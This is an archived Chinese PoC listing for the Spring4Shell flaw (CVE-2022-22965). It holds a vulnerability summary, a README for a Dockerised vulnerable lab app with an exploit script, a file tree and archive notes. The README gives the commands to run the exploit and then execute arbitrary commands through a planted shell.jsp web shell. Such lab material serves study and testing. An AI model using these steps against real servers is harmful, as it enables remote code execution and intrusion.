关联漏洞
标题:
Spring Framework 代码注入漏洞
(CVE-2022-22965)
描述:Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 Spring Framework 存在代码注入漏洞,该漏洞源于 JDK 9+ 上的数据绑定的 RCE。以下产品和版本受到影响:5.3.0 至 5.3.17、5.2.0 至 5.2.19、较旧的和不受支持的版本也会受到影响。
描述
PoC and exploit for CVE-2022-22965 Spring4Shell
介绍
# Spring4Shell
Spring4Shell (CVE-2022-22965) Proof Of Concept with a vulnerable Tomcat server with a vulnerable spring4shell application.
## Details about this vulnerability
- [https://websecured.io/blog/624411cf775ad17d72274d16/spring4shell-poc](https://websecured.io/blog/624411cf775ad17d72274d16/spring4shell-poc)
- [https://www.springcloud.io/post/2022-03/spring-0day-vulnerability](https://www.springcloud.io/post/2022-03/spring-0day-vulnerability)
- [https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement)
# How to use
## Build the image
```bash
docker build . -t spring4shell
```
## Run the container
```bash
docker run -p 80:8080 spring4shell
```
You can also run it with the debugger port exposed if needed:
```bash
docker run -p 80:8080 –p 5005:5005 spring4shell
```
See the original blog post for the details of setting up a remote debugger in IntelliJ Idea!
## Run the exploit
```bash
./exploit.sh --url http://localhost/spring4shell/hello --dir spring4shell
```
Then, you can run any command remotely like this:
```bash
curl http://localhost/spring4shell/shell.jsp?cmd=id --output -
```
...or by visiting the URL above.
文件快照
[4.0K] /data/pocs/3cf061dc47f77db1a53712e2cd325a44d4ef6eb8
├── [ 497] Dockerfile
├── [3.6K] exploit.sh
├── [1.2K] README.md
└── [4.0K] vulnerable-app
├── [1.7K] pom.xml
└── [4.0K] src
└── [4.0K] main
├── [4.0K] java
│ └── [4.0K] com
│ └── [4.0K] spring4shell
│ ├── [ 206] DemoObject.java
│ ├── [ 559] HelloController.java
│ └── [ 415] HelloworldApplication.java
└── [4.0K] resources
├── [ 19] application.properties
├── [4.0K] static
│ ├── [4.0K] css
│ │ ├── [120K] bootstrap.min.css
│ │ └── [ 554] styles.css
│ └── [4.0K] imgs
│ └── [5.4K] logo.png
└── [4.0K] templates
└── [ 645] index.html
11 directories, 12 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。